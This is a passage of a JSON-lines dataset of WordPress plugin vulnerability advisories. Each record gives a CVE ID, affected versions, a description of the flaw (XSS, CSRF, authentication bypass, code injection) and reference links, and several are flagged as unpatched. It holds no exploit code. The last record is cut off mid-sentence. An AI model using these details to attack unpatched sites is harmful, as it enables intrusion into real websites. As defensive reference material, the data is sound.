{"CVE_ID":"CVE-2024-3639","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Posts Grid widget in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9729ccc9-e3f1-4096-8430-22998b386cec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9729ccc9-e3f1-4096-8430-22998b386cec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10233","slug":"sms-alert","versionImpact":"3.7.5","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175629\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175629\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13155","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.140","description":"The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Transparent Split Hero widget in all versions up to, and including, 1.5.140 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: Since the widget code isn't part of the code base, to apply the patch, the affected widget: Transparent Split Hero must be deleted and reinstalled manually.","refs":"[{\"url\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ba4880-9fbb-42e3-a8db-8115eb832b13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ba4880-9fbb-42e3-a8db-8115eb832b13?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10321","slug":"widgetkit-for-elementor","versionImpact":"2.5.4","description":"The All-in-One Addons for Elementor \u2013 WidgetKit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.4 in elements\/advanced-tab\/template\/view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/advanced-tab\\\/template\\\/view.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/advanced-tab\\\/template\\\/view.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e470017-c453-435d-8342-66874a794537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e470017-c453-435d-8342-66874a794537?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3906","slug":"integracao-entre-eduzz-e-wc-powers","versionImpact":"1.7.5","description":"The Integra\u00e7\u00e3o entre Eduzz e Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wep_opcoes' function in all versions up to, and including, 1.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the default registration role within the plugin's registration flow to Administrator, which allows any user to create an Administrator account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/admin\\\/class-wep-admin.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/admin\\\/class-wep-admin.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/include\\\/class-wep-webhook.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/include\\\/class-wep-webhook.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/wep-powers.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/wep-powers.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb85ed32-c391-45d2-9e86-cb97009210cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb85ed32-c391-45d2-9e86-cb97009210cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5534","slug":"esv-bible-shortcode-for-wordpress","versionImpact":"1.0.2","description":"The ESV Bible Shortcode for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'esv' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/esv-bible-shortcode-for-wordpress\\\/tags\\\/1.0.2\\\/esv-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/esv-bible-shortcode-for-wordpress\\\/tags\\\/1.0.2\\\/esv-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e8dc83-6417-4881-a9a3-15525c5cc6ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e8dc83-6417-4881-a9a3-15525c5cc6ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4761","slug":"baw-post-views-count","versionImpact":"3.0.2","description":"The Post Views Count WordPress plugin through 3.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad163020-8b9c-42cb-a55f-b137b224bafb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad163020-8b9c-42cb-a55f-b137b224bafb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4375","slug":"usc-e-shop","versionImpact":"2.2.7","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the usces_download_system_information() function in versions up to, and including, 2.2.7. This makes it possible for authenticated attackers to download information including WordPress settings, plugin settings, PHP settings and server settings.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82e856b-c8c9-4139-ad54-89368e3b7125?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82e856b-c8c9-4139-ad54-89368e3b7125?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4386","slug":"wp-security-questions","versionImpact":"1.0.5","description":"The WP Security Question plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23f9d758-4b5e-44e5-9f58-a37b01c4ffdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23f9d758-4b5e-44e5-9f58-a37b01c4ffdb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-questions\\\/trunk\\\/modules\\\/settings\\\/model.settings.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-questions\\\/trunk\\\/modules\\\/settings\\\/model.settings.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2438","slug":"userpro","versionImpact":"5.1.0","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.0. This is due to missing or incorrect nonce validation on the 'userpro_save_userdata' function. This makes it possible for unauthenticated attackers to update the user meta and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d30adc5-27a5-4549-84fc-b930f27f03e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d30adc5-27a5-4549-84fc-b930f27f03e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3638","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Marquee Text Widget, Testimonials Widget, and Testimonial Slider widgets in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58dfd766-7156-4aec-b8db-76908b775ba0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58dfd766-7156-4aec-b8db-76908b775ba0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9073","slug":"gtg-advanced-blocks","versionImpact":"1.1.3","description":"The GutenGeek Free Gutenberg Blocks for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c68f9d-a026-4cef-82e6-25949a3d59ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c68f9d-a026-4cef-82e6-25949a3d59ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gtg-advanced-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gtg-advanced-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9822","slug":"pedalo-connector","versionImpact":"2.0.5","description":"The Pedalo Connector plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.5. This is due to insufficient restriction on the 'login_admin_user' function. This makes it possible for unauthenticated attackers to log to the first user, who is usually the administrator, or if it does not exist, then to the first administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab0d342-bfa7-4760-b839-37c3354414ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab0d342-bfa7-4760-b839-37c3354414ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pedalo-connector\\\/tags\\\/2.0.5\\\/public\\\/class-pedalo_connector-public.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pedalo-connector\\\/tags\\\/2.0.5\\\/public\\\/class-pedalo_connector-public.php#L118\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10185","slug":"streamweasels-youtube-integration","versionImpact":"1.3.2","description":"The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-youtube-embed shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176030\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176030\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12167","slug":"ultimate-shortcodes-creator","versionImpact":"2.2.0","description":"The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-admin.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-admin.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db6ccadb-5e90-4234-88cc-28241846acea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db6ccadb-5e90-4234-88cc-28241846acea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13422","slug":"seo-blogger-to-wordpress-301-redirector","versionImpact":"0.4.8","description":"The SEO Blogger to WordPress Migration using 301 Redirection plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter in all versions up to, and including, 0.4.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-blogger-to-wordpress-301-redirector\\\/trunk\\\/seo-blogger-to-wordpress.php#L356\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-blogger-to-wordpress-301-redirector\\\/trunk\\\/seo-blogger-to-wordpress.php#L356\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e095b5-9c0b-45ac-a78d-e50feda348cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e095b5-9c0b-45ac-a78d-e50feda348cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-25077","slug":"easy-chart-builder","versionImpact":"1.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dugbug Easy Chart Builder for WordPress allows Stored XSS. This issue affects Easy Chart Builder for WordPress: from n\/a through 1.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-chart-builder\\\/vulnerability\\\/wordpress-easy-chart-builder-for-wordpress-plugin-1-3-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-chart-builder\\\/vulnerability\\\/wordpress-easy-chart-builder-for-wordpress-plugin-1-3-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3491","slug":"add-custom-page-template","versionImpact":"2.0.1","description":"The Add custom page template plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'acpt_validate_setting' function. This is due to insufficient sanitization of the 'template_name' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/add-custom-page-template\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/add-custom-page-template\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c2d97c4-b166-4d1f-8042-d0362e650c62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c2d97c4-b166-4d1f-8042-d0362e650c62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4754","slug":"easy-facebook-like-box","versionImpact":"4.1.2","description":"The Easy Social Box \/ Page Plugin WordPress plugin through 4.1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2cc0ab2-9bfd-4a09-ac31-bd90e6da12db\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2cc0ab2-9bfd-4a09-ac31-bd90e6da12db\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4385","slug":"wp-private-content-plus","versionImpact":"3.1","description":"The WP Private Content Plus plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1. This is due to missing or incorrect nonce validation on the save_groups() function. This makes it possible for unauthenticated attackers to add new group members via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473452%40wp-private-content-plus&new=2473452%40wp-private-content-plus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473452%40wp-private-content-plus&new=2473452%40wp-private-content-plus&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/238f6d81-78ba-426c-866a-31f9279e4f99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/238f6d81-78ba-426c-866a-31f9279e4f99?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2437","slug":"userpro","versionImpact":"5.1.1","description":"The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this 